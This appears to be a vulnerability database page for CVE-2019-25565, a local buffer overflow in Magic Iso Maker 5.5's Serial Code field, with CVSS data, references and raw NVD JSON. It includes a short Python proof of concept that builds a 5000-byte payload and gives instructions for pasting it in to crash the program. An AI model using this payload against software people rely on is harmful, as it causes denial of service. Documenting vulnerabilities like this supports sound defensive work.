CVE-2019-25565

Description

Magic Iso Maker 5.5 build 281 contains a buffer overflow vulnerability in the Serial Code registration field that allows local attackers to crash the application by submitting an oversized input. Attackers can generate a file containing 5000 bytes of data, paste it into the Serial Code field during registration, and trigger a denial of service condition that crashes the application.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:magiciso:magic_iso_maker:5.5:build281:*:*:*:*:*:* - VULNERABLE

Magic Iso Maker 5.5 build 281

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept for CVE-2019-25565
# Generates a payload to trigger the buffer overflow in Magic ISO Maker 5.5 build 281

def generate_poc():
    # Create a buffer of 5000 bytes (e.g., 'A' characters)
    payload = "A" * 5000
    
    try:
        # Write payload to a file
        with open("magiciso_poc.txt", "w") as file:
            file.write(payload)
        print("[+] PoC file 'magiciso_poc.txt' generated successfully.")
        print("[*] Instruction: Copy the content of the file and paste it into the 'Serial Code' field during Magic ISO Maker registration.")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    generate_poc()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25565
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25565
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25565/
[4] VulDB https://vuldb.com/cve/CVE-2019-25565
[5] http://www.magiciso.com
[6] http://www.magiciso.com/Setup_MagicISO.exe
[7] https://www.exploit-db.com/exploits/46656
[8] https://www.vulncheck.com/advisories/magic-iso-maker-buffer-overflow-denial-of-service

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25565", "sourceIdentifier": "[email protected]", "published": "2026-03-21T13:16:19.900", "lastModified": "2026-04-16T18:10:51.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Magic Iso Maker 5.5 build 281 contains a buffer overflow vulnerability in the Serial Code registration field that allows local attackers to crash the application by submitting an oversized input. Attackers can generate a file containing 5000 bytes of data, paste it into the Serial Code field during registration, and trigger a denial of service condition that crashes the application."}, {"lang": "es", "value": "Magic Iso Maker 5.5 build 281 contiene una vulnerabilidad de desbordamiento de búfer en el campo de registro Serial Code que permite a atacantes locales bloquear la aplicación al enviar una entrada sobredimensionada. Los atacantes pueden generar un archivo que contenga 5000 bytes de datos, pegarlo en el campo Serial Code durante el registro y desencadenar una condición de denegación de servicio que bloquea la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:magiciso:magic_iso_maker:5.5:build281:*:*:*:*:*:*", "matchCriteriaId": "84DFEFCF-D152-4CC6-9709-5B8B35A06E85"}]}]}], "references": [{"url": "http://www.magiciso.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "http://www.magiciso.com/Setup_MagicISO.exe", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://www.exploit-db.com/exploits/46656", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/magic-iso-maker-buffer-overflow-denial-of-service", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}